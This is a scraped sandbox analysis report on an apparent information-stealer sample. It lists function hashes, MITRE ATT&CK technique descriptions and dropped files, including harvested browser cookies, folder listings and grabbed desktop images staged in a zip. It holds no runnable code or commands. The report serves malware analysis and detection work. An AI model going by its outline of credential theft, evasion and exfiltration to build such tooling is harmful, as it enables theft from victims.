Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 464630003fb911bf2abdd36d07e78ae97688c0ab2e92eb3091acd602a05af41f
Instruction ID: 97c305951bf2a628a8f6f669b67e50079651831816fba188c84f6a6f73cd9601
Opcode Fuzzy Hash: 464630003fb911bf2abdd36d07e78ae97688c0ab2e92eb3091acd602a05af41f
Instruction Fuzzy Hash: A7F03A709403469FDB60DFB9C5587ABBBF4AF04704F1009ADC455DB652D7B099448BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00A6C4BD Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28d2efa2badd11b2a379ade74077ce8db1146936bfbe0227695913cefc578c93
Instruction ID: 83b9b504feeaf40d0c30b437485c3dae8726d367c3cc9245ce1fc547698bdfb1
Opcode Fuzzy Hash: 28d2efa2badd11b2a379ade74077ce8db1146936bfbe0227695913cefc578c93
Instruction Fuzzy Hash: B2F09D74A40205DFDB14CF98C999AA9BBF1AF08724F258459E446AB6A0C774AD44CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00A6DCE8 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48c4aea266d7b68340d070785c7f8ecc953a7be90524c89bb6f01dd9a792ea3e
Instruction ID: 5ba52f5707efa8563fbfbd52d41f3ead0688fa81a5444c1fa9557fe87eca9a33
Opcode Fuzzy Hash: 48c4aea266d7b68340d070785c7f8ecc953a7be90524c89bb6f01dd9a792ea3e
Instruction Fuzzy Hash: E7E04F353001104BDB08B7A5E494AAE379BEBC9326F4000A9E40EC7B98DE796CC786D9

Uniqueness

Uniqueness Score: -1.00%

Function 00A65BF6 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9233989449a5128fbabd591ac6c9b7e35a28045609e71ac1bf129a8305225aa
Instruction ID: 8723ceff8171c3c4b90e074e5fdb9493f86513c7e56b4cead510ec4d543de104
Opcode Fuzzy Hash: e9233989449a5128fbabd591ac6c9b7e35a28045609e71ac1bf129a8305225aa
Instruction Fuzzy Hash: EBE0E576E001089FDB14CB98F444AECFBF1FF88225F1481A6E518A3651E7305955CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A683B1 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a73a4ca362c42ee93ffff0434e08116a73ffcec4125b0798d9508f5144478f92
Instruction ID: 716b00fc9873ba581206c664d56321553a61cfd4f0ab96cac467a2f8691a206d
Opcode Fuzzy Hash: a73a4ca362c42ee93ffff0434e08116a73ffcec4125b0798d9508f5144478f92
Instruction Fuzzy Hash: 1ED05EB594F3845FCB278BA05C656A93FB45D5720170942DFC88BCB653D66A8807CF13

Uniqueness

Uniqueness Score: -1.00%

Function 00A66770 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 604e11fb40cd6c408cb2e1c1f9a46da5e068d06e8015436fa7d946d765363b4c
Instruction ID: 1bdcb308c60e38efd74b57b4dd749d913466473cbdbf24470ef64ff1efb0cef4
Opcode Fuzzy Hash: 604e11fb40cd6c408cb2e1c1f9a46da5e068d06e8015436fa7d946d765363b4c
Instruction Fuzzy Hash: 66D05E1248E2B42CC71152A82C21FEA6F684B93271F1883ABF5A5191E7C04004018292

Uniqueness

Uniqueness Score: -1.00%

Function 00A628AC Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 508c43a709e32a85d5e2c39eca77a003dd825caa3cb9d0236a72a87abdd1aee8
Instruction ID: cc443457fb528f6cbc124f0d7a3a278942bd67a818d75fd0718ee8dceb85e4b9
Opcode Fuzzy Hash: 508c43a709e32a85d5e2c39eca77a003dd825caa3cb9d0236a72a87abdd1aee8
Instruction Fuzzy Hash: 14D0122124E17831C75021595C55EA7795C8B43371F248773F6B8952D5C5515C0051E5

Uniqueness

Uniqueness Score: -1.00%

Function 00A6C3D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e19a36b643ecad74ab8e3884951d356b47645254dcee1533935bc1b8b6e3558e
Instruction ID: 6a22517867a3a53444424914dfac3ff35bd0c12d595d8faada3baf711c878536
Opcode Fuzzy Hash: e19a36b643ecad74ab8e3884951d356b47645254dcee1533935bc1b8b6e3558e
Instruction Fuzzy Hash: 88C048342A02088F8204DB59D484C5033A8AF48A2935100D8E5098B732CB22FC52CA80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A64750 Relevance: 6.7, Strings: 5, Instructions: 491COMMON

Download Yara Rule

Strings

A, xrefs: 00A649B7
E, xrefs: 00A649CB
U, xrefs: 00A64C10
T, xrefs: 00A64C1D
, xrefs: 00A64ABB

Memory Dump Source

Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID: $A$E$T$U
API String ID: 0-1503325869
Opcode ID: d245b25be2939da6bbc5abdad6a2da3bd04413cd88507874b34ba48069a115ce
Instruction ID: 408742822947c303ff358ece307599ffc5bee8b58cc80964dee7c4db14b6420d
Opcode Fuzzy Hash: d245b25be2939da6bbc5abdad6a2da3bd04413cd88507874b34ba48069a115ce
Instruction Fuzzy Hash: 4612D631E042448FEF15DBA8C885BEEBBB2BF8A304F09C169D1456F386DB75A885C751

Uniqueness

Uniqueness Score: -1.00%

Function 04B192B8 Relevance: .5, Instructions: 463COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.530825016.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4281a5d8a7f8ef4729a91b0ce7544f82f0c553ba1270321d830f5ba7019cec0c
Instruction ID: bc4b86c6b2cb97e243bde47c6a40815e748eac3cb49a9120ce5a4d354f33ffc1
Opcode Fuzzy Hash: 4281a5d8a7f8ef4729a91b0ce7544f82f0c553ba1270321d830f5ba7019cec0c
Instruction Fuzzy Hash: 01122F78A002089BCB18EBB1D954EAE7777EFC9318F118028D5015B7A8CF39BD46DB95

Uniqueness

Uniqueness Score: -1.00%

Function 04B192C8 Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.530825016.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c15fff4465edbae8c8b8b8ab98487fafc574f14999f040bd3a12357d733947a1
Instruction ID: 769eae12f7529b40b7c2f860af181462ebeedf09df63a92d091167333368798d
Opcode Fuzzy Hash: c15fff4465edbae8c8b8b8ab98487fafc574f14999f040bd3a12357d733947a1
Instruction Fuzzy Hash: 92122F78A002089BCB18EBB1D954EAE7777EFC9318F118028D5015B7A8CF39BD46DB95

Uniqueness

Uniqueness Score: -1.00%

Function 04B1A7D8 Relevance: .4, Instructions: 424COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.530825016.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc49aabbaab0e8d8750ba24e8f8c8a237756b87ec03e69d2f9eb1c5053c766e5
Instruction ID: d67a23760b4832023e45288d92bf8e01cdca1c8e33af54a0fcda277d573f32ea
Opcode Fuzzy Hash: bc49aabbaab0e8d8750ba24e8f8c8a237756b87ec03e69d2f9eb1c5053c766e5
Instruction Fuzzy Hash: 75F19A31A016158FCB08DF68C994AADBBF2FF88314F5585A9E406AB365DB30FC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A6D560 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6df814998738280bab8b8f6bcd80f1ace4c9edce72f2c1ff635d2c6063a7fef0
Instruction ID: b62e82c5255af8816e0fde8584016712886292535f2170f69ec3977493419c44
Opcode Fuzzy Hash: 6df814998738280bab8b8f6bcd80f1ace4c9edce72f2c1ff635d2c6063a7fef0
Instruction Fuzzy Hash: D8B1E471F006468FCB15DE2AC4847AEBBB2ABE034AF28C53DD556C7356CA34D942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04B18770 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.530825016.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19cbdbe0387ae496f274f7b1e1ab97eb5d9dba89152116e6a457853fe2d94d2e
Instruction ID: d24a44b8860488206510154aa1e99c8a973144a64d21ac0ca4ed11ac8eaea1ba
Opcode Fuzzy Hash: 19cbdbe0387ae496f274f7b1e1ab97eb5d9dba89152116e6a457853fe2d94d2e
Instruction Fuzzy Hash: 77A13078A002099FDB18EB60D954EAE7773FFC8318F118028D9016B768CF39AD46DB95

Uniqueness

Uniqueness Score: -1.00%

Function 04B18780 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.530825016.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa5451ec327e5af55a2877cdf489f2f2677d925052151e06fa0b1f7ec65be676
Instruction ID: b4daa00eea8f9bb558521faf0860566fbacb4e4ed63a5a9ac5666d49319f2a1b
Opcode Fuzzy Hash: fa5451ec327e5af55a2877cdf489f2f2677d925052151e06fa0b1f7ec65be676
Instruction Fuzzy Hash: 7DA12178A002089FDB18EB61D954EAE7777FFC8318F118028D9016B768CF39AD46DB95

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report build (2).bin

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\DotNetZip-wu2oacf5.tmp

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US.zip (copy)

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Browsers\Google\Cookies.txt

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\Desktop.txt

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\Documents.txt

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\Downloads.txt

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\OneDrive.txt

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\Pictures.txt

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\Startup.txt

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\Temp.txt

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\Videos.txt

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\GAOBCVIQIJ.jpg

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\IPKGELNTQY.jpg

Windows Analysis Report
build (2).bin

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre